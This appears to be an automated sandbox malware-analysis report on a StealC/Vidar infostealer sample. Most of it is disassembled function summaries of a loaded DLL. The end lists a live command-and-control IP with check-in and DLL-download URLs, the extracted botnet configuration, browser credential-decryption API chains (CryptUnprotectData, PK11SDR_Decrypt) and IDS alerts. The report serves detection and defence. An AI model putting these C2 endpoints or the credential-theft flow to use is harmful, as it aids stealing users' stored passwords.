Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction ID: f8c6926e3cb4d4af112b9870dfa7403b397d49b61d05b120268176a51f4f12c6
Opcode Fuzzy Hash: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction Fuzzy Hash: 85110330A04B41C7D321CF2AC8407A5B3B0FFDA319F14970AE84953E02EBB0B5C5879A

Function 6C693DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C65F20E,?), ref: 6C693DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C65F20E,00000000,?), ref: 6C693DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C693E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C693E0E

Part of subcall function 6C68CC00: GetCurrentProcess.KERNEL32(?,?,6C6531A7), ref: 6C68CC0D
Part of subcall function 6C68CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6531A7), ref: 6C68CC16

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 82a6360a373ecd281ae6919c82bcd1b75556bec14f788fb4d8f0f9eba5c47a7f
Instruction ID: 1eb75ff979cc5475eae7f49dcf4a0ee0aad8e9e8d9996727dab3d755bc266919
Opcode Fuzzy Hash: 82a6360a373ecd281ae6919c82bcd1b75556bec14f788fb4d8f0f9eba5c47a7f
Instruction Fuzzy Hash: 9BF0F8B1A002087BDB00AB55EC81DAB376DEB87628F040021FE0957741D636BE6996FF

Function 6C6A85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C6A85D3

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C6A8725

Strings

map/set<T> too long, xrefs: 6C6A8720

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: a2a27303650dbd5e9a7fe60878a720a47f4d3f5136fab0440a28ca324daa6040
Instruction ID: 70b27cce337b19c255c6b91cde610e625e735871812691eeb71a8baf6980d39e
Opcode Fuzzy Hash: a2a27303650dbd5e9a7fe60878a720a47f4d3f5136fab0440a28ca324daa6040
Instruction Fuzzy Hash: FA515674A006818FE701CF58C184A59FBF1BF4A318F19C19AD8595BB62C375EC46CF96

Function 6C65BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C65BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C65BE8F

Strings

0, xrefs: 6C65BE5B

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction ID: 5aff77c52a83a249f610f6a40117f5f17253505299baa17352f2cf3b02d9aadf
Opcode Fuzzy Hash: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction Fuzzy Hash: 6F41B171A09745CFC301CF28C481A9BB7F4AFCA388F544B1DF985A7611D730E9698B8A

Function 6C693CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C693D19
mozalloc_abort.MOZGLUE(?), ref: 6C693D6C

Strings

d, xrefs: 6C693D58

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction ID: ae81405fb39a1e9092750637fc88ed10a7b0fe2e72f912b9bd23e2162f856e3d
Opcode Fuzzy Hash: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction Fuzzy Hash: 8111C435E0468997DB008F6ACC644EDB7B5EF86318F458229DD4997622EB30A688C398

Function 6C6B6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C6B6E22
__Init_thread_footer.LIBCMT ref: 6C6B6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C6B6E1D

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 39a29bee2b8b57065e6a5f8ed2424b066c1647657c83e079799a23cb29785f06
Instruction ID: bcd68a56edc4a956bdd073aa2d8006e056c651a881adc380280f84d7f154e701
Opcode Fuzzy Hash: 39a29bee2b8b57065e6a5f8ed2424b066c1647657c83e079799a23cb29785f06
Instruction Fuzzy Hash: 2DF02E302492C08BDB008B69C8A1A9173B29303318F080165F80196FA2CB31F627CFAF

Function 6C669E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C669EEF

Strings

Infinity, xrefs: 6C669EB7
NaN, xrefs: 6C669EC1

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 69064ab08258a321f268fc936855b8ae153423eff6b17a422022ef0b64cf6071
Instruction ID: c4194f2a258d45e7e49048328d94766e7d17b0c02063ac6c994417b112666e3a
Opcode Fuzzy Hash: 69064ab08258a321f268fc936855b8ae153423eff6b17a422022ef0b64cf6071
Instruction Fuzzy Hash: E1F06D71601641CBDB00CF5AD8C5B9033F1B74771DF250A19C9440AF81D7767646CA9F

Function 6C666C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C42

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C58

Strings

0Kil, xrefs: 6C666C33, 6C666C41, 6C666C57

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Kil
API String ID: 1967447596-1570486273
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 47a2848e409718a8f1d8a2683fe2594ab049f9b896a105d641ef50186a662689
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: F4E086F1A10D455B9F08D97FAC0956A71C88B553AC7044A35E823C6FC8FAB4E550815F

Function 6C66BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C66BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C66BEF5

Strings

cryptbase.dll, xrefs: 6C66BEF0

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 4870778a0ef8a45ee3d799cae793fcd5ec17f4a2edcaed08401fe318736b03b0
Instruction ID: 44563a522ee1324380eaf9a3347d73bdea828b5c897ecfb4e6088c6321dae0f1
Opcode Fuzzy Hash: 4870778a0ef8a45ee3d799cae793fcd5ec17f4a2edcaed08401fe318736b03b0
Instruction Fuzzy Hash: F7D0A731184209E6C7006B528C05B2937749782795F10C020F30544C52C7B0B413DF4D

Function 6C6AB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB628

Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A90FF
Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C6AB127,?,?,?,?,?,?,?,?), ref: 6C6AB74D

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 40779d404a368615f40afe1c83035d14527e88d70c3251f7b9a6a7ada22aca6f
Instruction ID: 085effcad87eddf0045659a872f45dad84b52f8dd6c581acd935d8d6010fba1a
Opcode Fuzzy Hash: 40779d404a368615f40afe1c83035d14527e88d70c3251f7b9a6a7ada22aca6f
Instruction Fuzzy Hash: 2251D071A0121A8FDB14CF98C98076EB7B1FF85308F55852DC85AAB710D771EC06CBA9

Function 6C6A6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C6A6EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C6A6EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6A6F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A6F5C

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 8644ccabdd39f7598f8190600c280acc267cedd63c2cddf56738e80d0d2e0910
Instruction ID: 0bc45efbc56a15fb90265375e450124e3aef0bdf4470a3bdb9cd26a8f81ef013
Opcode Fuzzy Hash: 8644ccabdd39f7598f8190600c280acc267cedd63c2cddf56738e80d0d2e0910
Instruction Fuzzy Hash: 7C31F871A1060A8FDB04CF6CC980AAA73FAFB95304F50413DD41AC7651EF31E95AC794

Function 6C6BB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C660A4D), ref: 6C6BB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C660A4D), ref: 6C6BB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C660A4D), ref: 6C6BB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C660A4D), ref: 6C6BB67F

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: d9d209a4901d0ed02fe7198cde96c2de8e2dc279f2c773b95c5bc01864716047
Instruction ID: 8faa6fbec7cdb6eb0e23bb9a89ffa2cdca4c2045baff36eeb0e7f7c129bded36
Opcode Fuzzy Hash: d9d209a4901d0ed02fe7198cde96c2de8e2dc279f2c773b95c5bc01864716047
Instruction Fuzzy Hash: 1C31D471A012168FDB10CF59C8C469ABBB5FFC5304F168669C846EB201EB31ED25CBA5

Function 6C68F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C68F611
memcpy.VCRUNTIME140(?,?,?), ref: 6C68F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C68F652
memcpy.VCRUNTIME140(?,?,?), ref: 6C68F668

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: fd0c959764e2c6f652b47417bb4cdd4b4b8c15a0ef4d9854fa31841a68e36b3a
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 95316F71B00214AFC714CF1DDCC0A9B7BB5EB94354B148538FA4A8BB04D732E9448BAA

Function 6C6A26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A26C1
free.MOZGLUE(?), ref: 6C6A26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A26FF
free.MOZGLUE ref: 6C6A270D

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d1ae15fc273256de6d2d0fba886dda6b015f370c63a0962ebae03874a0add4ca
Instruction ID: da9dc1a29145f47382f95be9498f80c97c9091a0ac98734626d699cba01f1fb2
Opcode Fuzzy Hash: d1ae15fc273256de6d2d0fba886dda6b015f370c63a0962ebae03874a0add4ca
Instruction Fuzzy Hash: EFF0F9B27012046BE7109E5AD8C4D4773A9EF4131CB100035EA1EC3B11E332FD1AC6AE

Source: http://185.215.113.37/0d60be0de163924d/nss3.dllr	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll1	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll-	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpm	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpyl;	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpl	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpch	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php_	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/$5	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpK	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dllM	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllC	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php7	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/C5	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpwser	Avira URL Cloud: Label: malware

Source: 0.2.file.exe.540000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.540000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Source: http://185.215.113.37/	Virustotal: Detection: 17%	Perma Link
Source: http://185.215.113.37	Virustotal: Detection: 17%	Perma Link
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Virustotal: Detection: 20%	Perma Link
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllr	Virustotal: Detection: 16%	Perma Link
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Virustotal: Detection: 20%	Perma Link
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Virustotal: Detection: 20%	Perma Link
Source: http://185.215.113.37/e2b1563c6670f193.phpm	Virustotal: Detection: 16%	Perma Link
Source: http://185.215.113.37/e2b1563c6670f193.php.dll	Virustotal: Detection: 16%	Perma Link
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Virustotal: Detection: 20%	Perma Link
Source: http://185.215.113.37/e2b1563c6670f193.phpl	Virustotal: Detection: 16%	Perma Link
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Virustotal: Detection: 20%	Perma Link
Source: http://185.215.113.37/e2b1563c6670f193.php_	Virustotal: Detection: 16%	Perma Link
Source: http://185.215.113.37/e2b1563c6670f193.phpK	Virustotal: Detection: 16%	Perma Link
Source: http://185.215.113.37/e2b1563c6670f193.phption:	Virustotal: Detection: 16%	Perma Link
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Virustotal: Detection: 20%	Perma Link
Source: http://185.215.113.37/e2b1563c6670f193.php	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Virustotal: Detection: 20%	Perma Link
Source: http://185.215.113.37/e2b1563c6670f193.php/	Virustotal: Detection: 17%	Perma Link
Source: http://185.215.113.37/e2b1563c6670f193.php7	Virustotal: Detection: 16%	Perma Link

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00549B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00549B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0054C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00547240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00547240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00549AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00549AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00558EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00558EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C666C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
